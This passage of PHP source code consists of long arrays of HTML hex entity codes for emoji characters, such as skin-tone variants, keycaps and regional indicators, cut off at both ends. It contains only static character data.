'&#x26f7;&#x1f3fe;', '&#x26f7;&#x1f3ff;', '&#x26f9;&#x1f3fb;', '&#x26f9;&#x1f3fc;', '&#x26f9;&#x1f3fd;', '&#x26f9;&#x1f3fe;', '&#x26f9;&#x1f3ff;', '&#x270a;&#x1f3fb;', '&#x270a;&#x1f3fc;', '&#x270a;&#x1f3fd;', '&#x270a;&#x1f3fe;', '&#x270a;&#x1f3ff;', '&#x270b;&#x1f3fb;', '&#x270b;&#x1f3fc;', '&#x270b;&#x1f3fd;', '&#x270b;&#x1f3fe;', '&#x270b;&#x1f3ff;', '&#x270c;&#x1f3fb;', '&#x270c;&#x1f3fc;', '&#x270c;&#x1f3fd;', '&#x270c;&#x1f3fe;', '&#x270c;&#x1f3ff;', '&#x270d;&#x1f3fb;', '&#x270d;&#x1f3fc;', '&#x270d;&#x1f3fd;', '&#x270d;&#x1f3fe;', '&#x270d;&#x1f3ff;', '&#x23;&#x20e3;', '&#x2a;&#x20e3;', '&#x30;&#x20e3;', '&#x31;&#x20e3;', '&#x32;&#x20e3;', '&#x33;&#x20e3;', '&#x34;&#x20e3;', '&#x35;&#x20e3;', '&#x36;&#x20e3;', '&#x37;&#x20e3;', '&#x38;&#x20e3;', '&#x39;&#x20e3;', '&#x1f004;', '&#x1f0cf;', '&#x1f170;', '&#x1f171;', '&#x1f17e;', '&#x1f17f;', '&#x1f18e;', '&#x1f191;', '&#x1f192;', '&#x1f193;', '&#x1f194;', '&#x1f195;', '&#x1f196;', '&#x1f197;', '&#x1f198;', '&#x1f199;', '&#x1f19a;', '&#x1f1e6;', '&#x1f1e7;', '&#x1f1e8;', '&#x1f1e9;', '&#x1f1ea;', '&#x1f1eb;', '&#x1f1ec;', '&#x1f1ed;', '&#x1f1ee;', '&#x1f1ef;', '&#x1f1f0;', '&#x1f1f1;', '&#x1f1f2;', '&#x1f1f3;', '&#x1f1f4;', '&#x1f1f5;', '&#x1f1f6;', '&#x1f1f7;', '&#x1f1f8;', '&#x1f1f9;', '&#x1f1fa;', '&#x1f1fb;', '&#x1f1fc;', '&#x1f1fd;', '&#x1f1fe;', '&#x1f1ff;', '&#x1f201;', '&#x1f202;', '&#x1f21a;', '&#x1f22f;', '&#x1f232;', '&#x1f233;', '&#x1f234;', '&#x1f235;', '&#x1f236;', '&#x1f237;', '&#x1f238;', '&#x1f239;', '&#x1f23a;', '&#x1f250;', '&#x1f251;', '&#x1f300;', '&#x1f301;', '&#x1f302;', '&#x1f303;', '&#x1f304;', '&#x1f305;', '&#x1f306;', '&#x1f307;', '&#x1f308;', '&#x1f309;', '&#x1f30a;', '&#x1f30b;', '&#x1f30c;', '&#x1f30d;', '&#x1f30e;', '&#x1f30f;', '&#x1f310;', '&#x1f311;', '&#x1f312;', '&#x1f313;', '&#x1f314;', '&#x1f315;', '&#x1f316;', '&#x1f317;', '&#x1f318;', '&#x1f319;', '&#x1f31a;', '&#x1f31b;', '&#x1f31c;', '&#x1f31d;', '&#x1f31e;', '&#x1f31f;', '&#x1f320;', '&#x1f321;', '&#x1f324;', '&#x1f325;', '&#x1f326;', '&#x1f327;', '&#x1f328;', '&#x1f329;', '&#x1f32a;', '&#x1f32b;', '&#x1f32c;', '&#x1f32d;', '&#x1f32e;', '&#x1f32f;', '&#x1f330;', '&#x1f331;', '&#x1f332;', '&#x1f333;', '&#x1f334;', '&#x1f335;', '&#x1f336;', '&#x1f337;', '&#x1f338;', '&#x1f339;', '&#x1f33a;', '&#x1f33b;', '&#x1f33c;', '&#x1f33d;', '&#x1f33e;', '&#x1f33f;', '&#x1f340;', '&#x1f341;', '&#x1f342;', '&#x1f343;', '&#x1f344;', '&#x1f345;', '&#x1f346;', '&#x1f347;', '&#x1f348;', '&#x1f349;', '&#x1f34a;', '&#x1f34b;', '&#x1f34c;', '&#x1f34d;', '&#x1f34e;', '&#x1f34f;', '&#x1f350;', '&#x1f351;', '&#x1f352;', '&#x1f353;', '&#x1f354;', '&#x1f355;', '&#x1f356;', '&#x1f357;', '&#x1f358;', '&#x1f359;', '&#x1f35a;', '&#x1f35b;', '&#x1f35c;', '&#x1f35d;', '&#x1f35e;', '&#x1f35f;', '&#x1f360;', '&#x1f361;', '&#x1f362;', '&#x1f363;', '&#x1f364;', '&#x1f365;', '&#x1f366;', '&#x1f367;', '&#x1f368;', '&#x1f369;', '&#x1f36a;', '&#x1f36b;', '&#x1f36c;', '&#x1f36d;', '&#x1f36e;', '&#x1f36f;', '&#x1f370;', '&#x1f371;', '&#x1f372;', '&#x1f373;', '&#x1f374;', '&#x1f375;', '&#x1f376;', '&#x1f377;', '&#x1f378;', '&#x1f379;', '&#x1f37a;', '&#x1f37b;', '&#x1f37c;', '&#x1f37d;', '&#x1f37e;', '&#x1f37f;', '&#x1f380;', '&#x1f381;', '&#x1f382;', '&#x1f383;', '&#x1f384;', '&#x1f385;', '&#x1f386;', '&#x1f387;', '&#x1f388;', '&#x1f389;', '&#x1f38a;', '&#x1f38b;', '&#x1f38c;', '&#x1f38d;', '&#x1f38e;', '&#x1f38f;', '&#x1f390;', '&#x1f391;', '&#x1f392;', '&#x1f393;', '&#x1f396;', '&#x1f397;', '&#x1f399;', '&#x1f39a;', '&#x1f39b;', '&#x1f39e;', '&#x1f39f;', '&#x1f3a0;', '&#x1f3a1;', '&#x1f3a2;', '&#x1f3a3;', '&#x1f3a4;', '&#x1f3a5;', '&#x1f3a6;', '&#x1f3a7;', '&#x1f3a8;', '&#x1f3a9;', '&#x1f3aa;', '&#x1f3ab;', '&#x1f3ac;', '&#x1f3ad;', '&#x1f3ae;', '&#x1f3af;', '&#x1f3b0;', '&#x1f3b1;', '&#x1f3b2;', '&#x1f3b3;', '&#x1f3b4;', '&#x1f3b5;', '&#x1f3b6;', '&#x1f3b7;', '&#x1f3b8;', '&#x1f3b9;', '&#x1f3ba;', '&#x1f3bb;', '&#x1f3bc;', '&#x1f3bd;', '&#x1f3be;', '&#x1f3bf;', '&#x1f3c0;', '&#x1f3c1;', '&#x1f3c2;', '&#x1f3c3;', '&#x1f3c4;', '&#x1f3c5;', '&#x1f3c6;', '&#x1f3c7;', '&#x1f3c8;', '&#x1f3c9;', '&#x1f3ca;', '&#x1f3cb;', '&#x1f3cc;', '&#x1f3cd;', '&#x1f3ce;', '&#x1f3cf;', '&#x1f3d0;', '&#x1f3d1;', '&#x1f3d2;', '&#x1f3d3;', '&#x1f3d4;', '&#x1f3d5;', '&#x1f3d6;', '&#x1f3d7;', '&#x1f3d8;', '&#x1f3d9;', '&#x1f3da;', '&#x1f3db;', '&#x1f3dc;', '&#x1f3dd;', '&#x1f3de;', '&#x1f3df;', '&#x1f3e0;', '&#x1f3e1;', '&#x1f3e2;', '&#x1f3e3;', '&#x1f3e4;', '&#x1f3e5;', '&#x1f3e6;', '&#x1f3e7;', '&#x1f3e8;', '&#x1f3e9;', '&#x1f3ea;', '&#x1f3eb;', '&#x1f3ec;', '&#x1f3ed;', '&#x1f3ee;', '&#x1f3ef;', '&#x1f3f0;', '&#x1f3f3;', '&#x1f3f4;', '&#x1f3f5;', '&#x1f3f7;', '&#x1f3f8;', '&#x1f3f9;', '&#x1f3fa;', '&#x1f3fb;', '&#x1f3fc;', '&#x1f3fd;', '&#x1f3fe;', '&#x1f3ff;', '&#x1f400;', '&#x1f401;', '&#x1f402;', '&#x1f403;', '&#x1f404;', '&#x1f405;', '&#x1f406;', '&#x1f407;', '&#x1f408;', '&#x1f409;', '&#x1f40a;', '&#x1f40b;', '&#x1f40c;', '&#x1f40d;', '&#x1f40e;', '&#x1f40f;', '&#x1f410;', '&#x1f411;', '&#x1f412;', '&#x1f413;', '&#x1f414;', '&#x1f415;', '&#x1f416;', '&#x1f417;', '&#x1f418;', '&#x1f419;', '&#x1f41a;', '&#x1f41b;', '&#x1f41c;', '&#x1f41d;', '&#x1f41e;', '&#x1f41f;', '&#x1f420;', '&#x1f421;', '&#x1f422;', '&#x1f423;', '&#x1f424;', '&#x1f425;', '&#x1f426;', '&#x1f427;', '&#x1f428;', '&#x1f429;', '&#x1f42a;', '&#x1f42b;', '&#x1f42c;', '&#x1f42d;', '&#x1f42e;', '&#x1f42f;', '&#x1f430;', '&#x1f431;', '&#x1f432;', '&#x1f433;', '&#x1f434;', '&#x1f435;', '&#x1f436;', '&#x1f437;', '&#x1f438;', '&#x1f439;', '&#x1f43a;', '&#x1f43b;', '&#x1f43c;', '&#x1f43d;', '&#x1f43e;', '&#x1f43f;', '&#x1f440;', '&#x1f441;', '&#x1f442;', '&#x1f443;', '&#x1f444;', '&#x1f445;', '&#x1f446;', '&#x1f447;', '&#x1f448;', '&#x1f449;', '&#x1f44a;', '&#x1f44b;', '&#x1f44c;', '&#x1f44d;', '&#x1f44e;', '&#x1f44f;', '&#x1f450;', '&#x1f451;', '&#x1f452;', '&#x1f453;', '&#x1f454;', '&#x1f455;', '&#x1f456;', '&#x1f457;', '&#x1f458;', '&#x1f459;', '&#x1f45a;', '&#x1f45b;', '&#x1f45c;', '&#x1f45d;', '&#x1f45e;', '&#x1f45f;', '&#x1f460;', '&#x1f461;', '&#x1f462;', '&#x1f463;', '&#x1f464;', '&#x1f465;', '&#x1f466;', '&#x1f467;', '&#x1f468;', '&#x1f469;', '&#x1f46a;', '&#x1f46b;', '&#x1f46c;', '&#x1f46d;', '&#x1f46e;', '&#x1f46f;', '&#x1f470;', '&#x1f471;', '&#x1f472;', '&#x1f473;', '&#x1f474;', '&#x1f475;', '&#x1f476;', '&#x1f477;', '&#x1f478;', '&#x1f479;', '&#x1f47a;', '&#x1f47b;', '&#x1f47c;', '&#x1f47d;', '&#x1f47e;', '&#x1f47f;', '&#x1f480;', '&#x1f481;', '&#x1f482;', '&#x1f483;', '&#x1f484;', '&#x1f485;', '&#x1f486;', '&#x1f487;', '&#x1f488;', '&#x1f489;', '&#x1f48a;', '&#x1f48b;', '&#x1f48c;', '&#x1f48d;', '&#x1f48e;', '&#x1f48f;', '&#x1f490;', '&#x1f491;', '&#x1f492;', '&#x1f493;', '&#x1f494;', '&#x1f495;', '&#x1f496;', '&#x1f497;', '&#x1f498;', '&#x1f499;', '&#x1f49a;', '&#x1f49b;', '&#x1f49c;', '&#x1f49d;', '&#x1f49e;', '&#x1f49f;', '&#x1f4a0;', '&#x1f4a1;', '&#x1f4a2;', '&#x1f4a3;', '&#x1f4a4;', '&#x1f4a5;', '&#x1f4a6;', '&#x1f4a7;', '&#x1f4a8;', '&#x1f4a9;', '&#x1f4aa;', '&#x1f4ab;', '&#x1f4ac;', '&#x1f4ad;', '&#x1f4ae;', '&#x1f4af;', '&#x1f4b0;', '&#x1f4b1;', '&#x1f4b2;', '&#x1f4b3;', '&#x1f4b4;', '&#x1f4b5;', '&#x1f4b6;', '&#x1f4b7;', '&#x1f4b8;', '&#x1f4b9;', '&#x1f4ba;', '&#x1f4bb;', '&#x1f4bc;', '&#x1f4bd;', '&#x1f4be;', '&#x1f4bf;', '&#x1f4c0;', '&#x1f4c1;', '&#x1f4c2;', '&#x1f4c3;', '&#x1f4c4;', '&#x1f4c5;', '&#x1f4c6;', '&#x1f4c7;', '&#x1f4c8;', '&#x1f4c9;', '&#x1f4ca;', '&#x1f4cb;', '&#x1f4cc;', '&#x1f4cd;', '&#x1f4ce;', '&#x1f4cf;', '&#x1f4d0;', '&#x1f4d1;', '&#x1f4d2;', '&#x1f4d3;', '&#x1f4d4;', '&#x1f4d5;', '&#x1f4d6;', '&#x1f4d7;', '&#x1f4d8;', '&#x1f4d9;', '&#x1f4da;', '&#x1f4db;', '&#x1f4dc;', '&#x1f4dd;', '&#x1f4de;', '&#x1f4df;', '&#x1f4e0;', '&#x1f4e1;', '&#x1f4e2;', '&#x1f4e3;', '&#x1f4e4;', '&#x1f4e5;', '&#x1f4e6;', '&#x1f4e7;', '&#x1f4e8;', '&#x1f4e9;', '&#x1f4ea;', '&#x1f4eb;', '&#x1f4ec;', '&#x1f4ed;', '&#x1f4ee;', '&#x1f4ef;', '&#x1f4f0;', '&#x1f4f1;', '&#x1f4f2;', '&#x1f4f3;', '&#x1f4f4;', '&#x1f4f5;', '&#x1f4f6;', '&#x1f4f7;', '&#x1f4f8;', '&#x1f4f9;', '&#x1f4fa;', '&#x1f4fb;', '&#x1f4fc;', '&#x1f4fd;', '&#x1f4ff;', '&#x1f500;', '&#x1f501;', '&#x1f502;', '&#x1f503;', '&#x1f504;', '&#x1f505;', '&#x1f506;', '&#x1f507;', '&#x1f508;', '&#x1f509;', '&#x1f50a;', '&#x1f50b;', '&#x1f50c;', '&#x1f50d;', '&#x1f50e;', '&#x1f50f;', '&#x1f510;', '&#x1f511;', '&#x1f512;', '&#x1f513;', '&#x1f514;', '&#x1f515;', '&#x1f516;', '&#x1f517;', '&#x1f518;', '&#x1f519;', '&#x1f51a;', '&#x1f51b;', '&#x1f51c;', '&#x1f51d;', '&#x1f51e;', '&#x1f51f;', '&#x1f520;', '&#x1f521;', '&#x1f522;', '&#x1f523;', '&#x1f524;', '&#x1f525;', '&#x1f526;', '&#x1f527;', '&#x1f528;', '&#x1f529;', '&#x1f52a;', '&#x1f52b;', '&#x1f52c;', '&#x1f52d;', '&#x1f52e;', '&#x1f52f;', '&#x1f530;', '&#x1f531;', '&#x1f532;', '&#x1f533;', '&#x1f534;', '&#x1f535;', '&#x1f536;', '&#x1f537;', '&#x1f538;', '&#x1f539;', '&#x1f53a;', '&#x1f53b;', '&#x1f53c;', '&#x1f53d;', '&#x1f549;', '&#x1f54a;', '&#x1f54b;', '&#x1f54c;', '&#x1f54d;', '&#x1f54e;', '&#x1f550;', '&#x1f551;', '&#x1f552;', '&#x1f553;', '&#x1f554;', '&#x1f555;', '&#x1f556;', '&#x1f557;', '&#x1f558;', '&#x1f559;', '&#x1f55a;', '&#x1f55b;', '&#x1f55c;', '&#x1f55d;', '&#x1f55e;', '&#x1f55f;', '&#x1f560;', '&#x1f561;', '&#x1f562;', '&#x1f563;', '&#x1f564;', '&#x1f565;', '&#x1f566;', '&#x1f567;', '&#x1f56f;', '&#x1f570;', '&#x1f573;', '&#x1f574;', '&#x1f575;', '&#x1f576;', '&#x1f577;', '&#x1f578;', '&#x1f579;', '&#x1f57a;', '&#x1f587;', '&#x1f58a;', '&#x1f58b;', '&#x1f58c;', '&#x1f58d;', '&#x1f590;', '&#x1f595;', '&#x1f596;', '&#x1f5a4;', '&#x1f5a5;', '&#x1f5a8;', '&#x1f5b1;', '&#x1f5b2;', '&#x1f5bc;', '&#x1f5c2;', '&#x1f5c3;', '&#x1f5c4;', '&#x1f5d1;', '&#x1f5d2;', '&#x1f5d3;', '&#x1f5dc;', '&#x1f5dd;', '&#x1f5de;', '&#x1f5e1;', '&#x1f5e3;', '&#x1f5e8;', '&#x1f5ef;', '&#x1f5f3;', '&#x1f5fa;', '&#x1f5fb;', '&#x1f5fc;', '&#x1f5fd;', '&#x1f5fe;', '&#x1f5ff;', '&#x1f600;', '&#x1f601;', '&#x1f602;', '&#x1f603;', '&#x1f604;', '&#x1f605;', '&#x1f606;', '&#x1f607;', '&#x1f608;', '&#x1f609;', '&#x1f60a;', '&#x1f60b;', '&#x1f60c;', '&#x1f60d;', '&#x1f60e;', '&#x1f60f;', '&#x1f610;', '&#x1f611;', '&#x1f612;', '&#x1f613;', '&#x1f614;', '&#x1f615;', '&#x1f616;', '&#x1f617;', '&#x1f618;', '&#x1f619;', '&#x1f61a;', '&#x1f61b;', '&#x1f61c;', '&#x1f61d;', '&#x1f61e;', '&#x1f61f;', '&#x1f620;', '&#x1f621;', '&#x1f622;', '&#x1f623;', '&#x1f624;', '&#x1f625;', '&#x1f626;', '&#x1f627;', '&#x1f628;', '&#x1f629;', '&#x1f62a;', '&#x1f62b;', '&#x1f62c;', '&#x1f62d;', '&#x1f62e;', '&#x1f62f;', '&#x1f630;', '&#x1f631;', '&#x1f632;', '&#x1f633;', '&#x1f634;', '&#x1f635;', '&#x1f636;', '&#x1f637;', '&#x1f638;', '&#x1f639;', '&#x1f63a;', '&#x1f63b;', '&#x1f63c;', '&#x1f63d;', '&#x1f63e;', '&#x1f63f;', '&#x1f640;', '&#x1f641;', '&#x1f642;', '&#x1f643;', '&#x1f644;', '&#x1f645;', '&#x1f646;', '&#x1f647;', '&#x1f648;', '&#x1f649;', '&#x1f64a;', '&#x1f64b;', '&#x1f64c;', '&#x1f64d;', '&#x1f64e;', '&#x1f64f;', '&#x1f680;', '&#x1f681;', '&#x1f682;', '&#x1f683;', '&#x1f684;', '&#x1f685;', '&#x1f686;', '&#x1f687;', '&#x1f688;', '&#x1f689;', '&#x1f68a;', '&#x1f68b;', '&#x1f68c;', '&#x1f68d;', '&#x1f68e;', '&#x1f68f;', '&#x1f690;', '&#x1f691;', '&#x1f692;', '&#x1f693;', '&#x1f694;', '&#x1f695;', '&#x1f696;', '&#x1f697;', '&#x1f698;', '&#x1f699;', '&#x1f69a;', '&#x1f69b;', '&#x1f69c;', '&#x1f69d;', '&#x1f69e;', '&#x1f69f;', '&#x1f6a0;', '&#x1f6a1;', '&#x1f6a2;', '&#x1f6a3;', '&#x1f6a4;', '&#x1f6a5;', '&#x1f6a6;', '&#x1f6a7;', '&#x1f6a8;', '&#x1f6a9;', '&#x1f6aa;', '&#x1f6ab;', '&#x1f6ac;', '&#x1f6ad;', '&#x1f6ae;', '&#x1f6af;', '&#x1f6b0;', '&#x1f6b1;', '&#x1f6b2;', '&#x1f6b3;', '&#x1f6b4;', '&#x1f6b5;', '&#x1f6b6;', '&#x1f6b7;', '&#x1f6b8;', '&#x1f6b9;', '&#x1f6ba;', '&#x1f6bb;', '&#x1f6bc;', '&#x1f6bd;', '&#x1f6be;', '&#x1f6bf;', '&#x1f6c0;', '&#x1f6c1;', '&#x1f6c2;', '&#x1f6c3;', '&#x1f6c4;', '&#x1f6c5;', '&#x1f6cb;', '&#x1f6cc;', '&#x1f6cd;', '&#x1f6ce;', '&#x1f6cf;', '&#x1f6d0;', '&#x1f6d1;', '&#x1f6d2;', '&#x1f6d5;', '&#x1f6d6;', '&#x1f6d7;', '&#x1f6dc;', '&#x1f6dd;', '&#x1f6de;', '&#x1f6df;', '&#x1f6e0;', '&#x1f6e1;', '&#x1f6e2;', '&#x1f6e3;', '&#x1f6e4;', '&#x1f6e5;', '&#x1f6e9;', '&#x1f6eb;', '&#x1f6ec;', '&#x1f6f0;', '&#x1f6f3;', '&#x1f6f4;', '&#x1f6f5;', '&#x1f6f6;', '&#x1f6f7;', '&#x1f6f8;', '&#x1f6f9;', '&#x1f6fa;', '&#x1f6fb;', '&#x1f6fc;', '&#x1f7e0;', '&#x1f7e1;', '&#x1f7e2;', '&#x1f7e3;', '&#x1f7e4;', '&#x1f7e5;', '&#x1f7e6;', '&#x1f7e7;', '&#x1f7e8;', '&#x1f7e9;', '&#x1f7ea;', '&#x1f7eb;', '&#x1f7f0;', '&#x1f90c;', '&#x1f90d;', '&#x1f90e;', '&#x1f90f;', '&#x1f910;', '&#x1f911;', '&#x1f912;', '&#x1f913;', '&#x1f914;', '&#x1f915;', '&#x1f916;', '&#x1f917;', '&#x1f918;', '&#x1f919;', '&#x1f91a;', '&#x1f91b;', '&#x1f91c;', '&#x1f91d;', '&#x1f91e;', '&#x1f91f;', '&#x1f920;', '&#x1f921;', '&#x1f922;', '&#x1f923;', '&#x1f924;', '&#x1f925;', '&#x1f926;', '&#x1f927;', '&#x1f928;', '&#x1f929;', '&#x1f92a;', '&#x1f92b;', '&#x1f92c;', '&#x1f92d;', '&#x1f92e;', '&#x1f92f;', '&#x1f930;', '&#x1f931;', '&#x1f932;', '&#x1f933;', '&#x1f934;', '&#x1f935;', '&#x1f936;', '&#x1f937;', '&#x1f938;', '&#x1f939;', '&#x1f93a;', '&#x1f93c;', '&#x1f93d;', '&#x1f93e;', '&#x1f93f;', '&#x1f940;', '&#x1f941;', '&#x1f942;', '&#x1f943;', '&#x1f944;', '&#x1f945;', '&#x1f947;', '&#x1f948;', '&#x1f949;', '&#x1f94a;', '&#x1f94b;', '&#x1f94c;', '&#x1f94d;', '&#x1f94e;', '&#x1f94f;', '&#x1f950;', '&#x1f951;', '&#x1f952;', '&#x1f953;', '&#x1f954;', '&#x1f955;', '&#x1f956;', '&#x1f957;', '&#x1f958;', '&#x1f959;', '&#x1f95a;', '&#x1f95b;', '&#x1f95c;', '&#x1f95d;', '&#x1f95e;', '&#x1f95f;', '&#x1f960;', '&#x1f961;', '&#x1f962;', '&#x1f963;', '&#x1f964;', '&#x1f965;', '&#x1f966;', '&#x1f967;', '&#x1f968;', '&#x1f969;', '&#x1f96a;', '&#x1f96b;', '&#x1f96c;', '&#x1f96d;', '&#x1f96e;', '&#x1f96f;', '&#x1f970;', '&#x1f971;', '&#x1f972;', '&#x1f973;', '&#x1f974;', '&#x1f975;', '&#x1f976;', '&#x1f977;', '&#x1f978;', '&#x1f979;', '&#x1f97a;', '&#x1f97b;', '&#x1f97c;', '&#x1f97d;', '&#x1f97e;', '&#x1f97f;', '&#x1f980;', '&#x1f981;', '&#x1f982;', '&#x1f983;', '&#x1f984;', '&#x1f985;', '&#x1f986;', '&#x1f987;', '&#x1f988;', '&#x1f989;', '&#x1f98a;', '&#x1f98b;', '&#x1f98c;', '&#x1f98d;', '&#x1f98e;', '&#x1f98f;', '&#x1f990;', '&#x1f991;', '&#x1f992;', '&#x1f993;', '&#x1f994;', '&#x1f995;', '&#x1f996;', '&#x1f997;', '&#x1f998;', '&#x1f999;', '&#x1f99a;', '&#x1f99b;', '&#x1f99c;', '&#x1f99d;', '&#x1f99e;', '&#x1f99f;', '&#x1f9a0;', '&#x1f9a1;', '&#x1f9a2;', '&#x1f9a3;', '&#x1f9a4;', '&#x1f9a5;', '&#x1f9a6;', '&#x1f9a7;', '&#x1f9a8;', '&#x1f9a9;', '&#x1f9aa;', '&#x1f9ab;', '&#x1f9ac;', '&#x1f9ad;', '&#x1f9ae;', '&#x1f9af;', '&#x1f9b0;', '&#x1f9b1;', '&#x1f9b2;', '&#x1f9b3;', '&#x1f9b4;', '&#x1f9b5;', '&#x1f9b6;', '&#x1f9b7;', '&#x1f9b8;', '&#x1f9b9;', '&#x1f9ba;', '&#x1f9bb;', '&#x1f9bc;', '&#x1f9bd;', '&#x1f9be;', '&#x1f9bf;', '&#x1f9c0;', '&#x1f9c1;', '&#x1f9c2;', '&#x1f9c3;', '&#x1f9c4;', '&#x1f9c5;', '&#x1f9c6;', '&#x1f9c7;', '&#x1f9c8;', '&#x1f9c9;', '&#x1f9ca;', '&#x1f9cb;', '&#x1f9cc;', '&#x1f9cd;', '&#x1f9ce;', '&#x1f9cf;', '&#x1f9d0;', '&#x1f9d1;', '&#x1f9d2;', '&#x1f9d3;', '&#x1f9d4;', '&#x1f9d5;', '&#x1f9d6;', '&#x1f9d7;', '&#x1f9d8;', '&#x1f9d9;', '&#x1f9da;', '&#x1f9db;', '&#x1f9dc;', '&#x1f9dd;', '&#x1f9de;', '&#x1f9df;', '&#x1f9e0;', '&#x1f9e1;', '&#x1f9e2;', '&#x1f9e3;', '&#x1f9e4;', '&#x1f9e5;', '&#x1f9e6;', '&#x1f9e7;', '&#x1f9e8;', '&#x1f9e9;', '&#x1f9ea;', '&#x1f9eb;', '&#x1f9ec;', '&#x1f9ed;', '&#x1f9ee;', '&#x1f9ef;', '&#x1f9f0;', '&#x1f9f1;', '&#x1f9f2;', '&#x1f9f3;', '&#x1f9f4;', '&#x1f9f5;', '&#x1f9f6;', '&#x1f9f7;', '&#x1f9f8;', '&#x1f9f9;', '&#x1f9fa;', '&#x1f9fb;', '&#x1f9fc;', '&#x1f9fd;', '&#x1f9fe;', '&#x1f9ff;', '&#x1fa70;', '&#x1fa71;', '&#x1fa72;', '&#x1fa73;', '&#x1fa74;', '&#x1fa75;', '&#x1fa76;', '&#x1fa77;', '&#x1fa78;', '&#x1fa79;', '&#x1fa7a;', '&#x1fa7b;', '&#x1fa7c;', '&#x1fa80;', '&#x1fa81;', '&#x1fa82;', '&#x1fa83;', '&#x1fa84;', '&#x1fa85;', '&#x1fa86;', '&#x1fa87;', '&#x1fa88;', '&#x1fa90;', '&#x1fa91;', '&#x1fa92;', '&#x1fa93;', '&#x1fa94;', '&#x1fa95;', '&#x1fa96;', '&#x1fa97;', '&#x1fa98;', '&#x1fa99;', '&#x1fa9a;', '&#x1fa9b;', '&#x1fa9c;', '&#x1fa9d;', '&#x1fa9e;', '&#x1fa9f;', '&#x1faa0;', '&#x1faa1;', '&#x1faa2;', '&#x1faa3;', '&#x1faa4;', '&#x1faa5;', '&#x1faa6;', '&#x1faa7;', '&#x1faa8;', '&#x1faa9;', '&#x1faaa;', '&#x1faab;', '&#x1faac;', '&#x1faad;', '&#x1faae;', '&#x1faaf;', '&#x1fab0;', '&#x1fab1;', '&#x1fab2;', '&#x1fab3;', '&#x1fab4;', '&#x1fab5;', '&#x1fab6;', '&#x1fab7;', '&#x1fab8;', '&#x1fab9;', '&#x1faba;', '&#x1fabb;', '&#x1fabc;', '&#x1fabd;', '&#x1fabf;', '&#x1fac0;', '&#x1fac1;', '&#x1fac2;', '&#x1fac3;', '&#x1fac4;', '&#x1fac5;', '&#x1face;', '&#x1facf;', '&#x1fad0;', '&#x1fad1;', '&#x1fad2;', '&#x1fad3;', '&#x1fad4;', '&#x1fad5;', '&#x1fad6;', '&#x1fad7;', '&#x1fad8;', '&#x1fad9;', '&#x1fada;', '&#x1fadb;', '&#x1fae0;', '&#x1fae1;', '&#x1fae2;', '&#x1fae3;', '&#x1fae4;', '&#x1fae5;', '&#x1fae6;', '&#x1fae7;', '&#x1fae8;', '&#x1faf0;', '&#x1faf1;', '&#x1faf2;', '&#x1faf3;', '&#x1faf4;', '&#x1faf5;', '&#x1faf6;', '&#x1faf7;', '&#x1faf8;', '&#x203c;', '&#x2049;', '&#x2122;', '&#x2139;', '&#x2194;', '&#x2195;', '&#x2196;', '&#x2197;', '&#x2198;', '&#x2199;', '&#x21a9;', '&#x21aa;', '&#x231a;', '&#x231b;', '&#x2328;', '&#x23cf;', '&#x23e9;', '&#x23ea;', '&#x23eb;', '&#x23ec;', '&#x23ed;', '&#x23ee;', '&#x23ef;', '&#x23f0;', '&#x23f1;', '&#x23f2;', '&#x23f3;', '&#x23f8;', '&#x23f9;', '&#x23fa;', '&#x24c2;', '&#x25aa;', '&#x25ab;', '&#x25b6;', '&#x25c0;', '&#x25fb;', '&#x25fc;', '&#x25fd;', '&#x25fe;', '&#x2600;', '&#x2601;', '&#x2602;', '&#x2603;', '&#x2604;', '&#x260e;', '&#x2611;', '&#x2614;', '&#x2615;', '&#x2618;', '&#x261d;', '&#x2620;', '&#x2622;', '&#x2623;', '&#x2626;', '&#x262a;', '&#x262e;', '&#x262f;', '&#x2638;', '&#x2639;', '&#x263a;', '&#x2640;', '&#x2642;', '&#x2648;', '&#x2649;', '&#x264a;', '&#x264b;', '&#x264c;', '&#x264d;', '&#x264e;', '&#x264f;', '&#x2650;', '&#x2651;', '&#x2652;', '&#x2653;', '&#x265f;', '&#x2660;', '&#x2663;', '&#x2665;', '&#x2666;', '&#x2668;', '&#x267b;', '&#x267e;', '&#x267f;', '&#x2692;', '&#x2693;', '&#x2694;', '&#x2695;', '&#x2696;', '&#x2697;', '&#x2699;', '&#x269b;', '&#x269c;', '&#x26a0;', '&#x26a1;', '&#x26a7;', '&#x26aa;', '&#x26ab;', '&#x26b0;', '&#x26b1;', '&#x26bd;', '&#x26be;', '&#x26c4;', '&#x26c5;', '&#x26c8;', '&#x26ce;', '&#x26cf;', '&#x26d1;', '&#x26d3;', '&#x26d4;', '&#x26e9;', '&#x26ea;', '&#x26f0;', '&#x26f1;', '&#x26f2;', '&#x26f3;', '&#x26f4;', '&#x26f5;', '&#x26f7;', '&#x26f8;', '&#x26f9;', '&#x26fa;', '&#x26fd;', '&#x2702;', '&#x2705;', '&#x2708;', '&#x2709;', '&#x270a;', '&#x270b;', '&#x270c;', '&#x270d;', '&#x270f;', '&#x2712;', '&#x2714;', '&#x2716;', '&#x271d;', '&#x2721;', '&#x2728;', '&#x2733;', '&#x2734;', '&#x2744;', '&#x2747;', '&#x274c;', '&#x274e;', '&#x2753;', '&#x2754;', '&#x2755;', '&#x2757;', '&#x2763;', '&#x2764;', '&#x2795;', '&#x2796;', '&#x2797;', '&#x27a1;', '&#x27b0;', '&#x27bf;', '&#x2934;', '&#x2935;', '&#x2b05;', '&#x2b06;', '&#x2b07;', '&#x2b1b;', '&#x2b1c;', '&#x2b50;', '&#x2b55;', '&#x3030;', '&#x303d;', '&#x3297;', '&#x3299;', '&#xe50a;');
    $AVCProfileIndication = array('&#x1f004;', '&#x1f0cf;', '&#x1f170;', '&#x1f171;', '&#x1f17e;', '&#x1f17f;', '&#x1f18e;', '&#x1f191;', '&#x1f192;', '&#x1f193;', '&#x1f194;', '&#x1f195;', '&#x1f196;', '&#x1f197;', '&#x1f198;', '&#x1f199;', '&#x1f19a;', '&#x1f1e6;', '&#x1f1e8;', '&#x1f1e9;', '&#x1f1ea;', '&#x1f1eb;', '&#x1f1ec;', '&#x1f1ee;', '&#x1f1f1;', '&#x1f1f2;', '&#x1f1f4;', '&#x1f1f6;', '&#x1f1f7;', '&#x1f1f8;', '&#x1f1f9;', '&#x1f1fa;', '&#x1f1fc;', '&#x1f1fd;', '&#x1f1ff;', '&#x1f1e7;', '&#x1f1ed;', '&#x1f1ef;', '&#x1f1f3;', '&#x1f1fb;', '&#x1f1fe;', '&#x1f1f0;', '&#x1f1f5;', '&#x1f201;', '&#x1f202;', '&#x1f21a;', '&#x1f22f;', '&#x1f232;', '&#x1f233;', '&#x1f234;', '&#x1f235;', '&#x1f236;', '&#x1f237;', '&#x1f238;', '&#x1f239;', 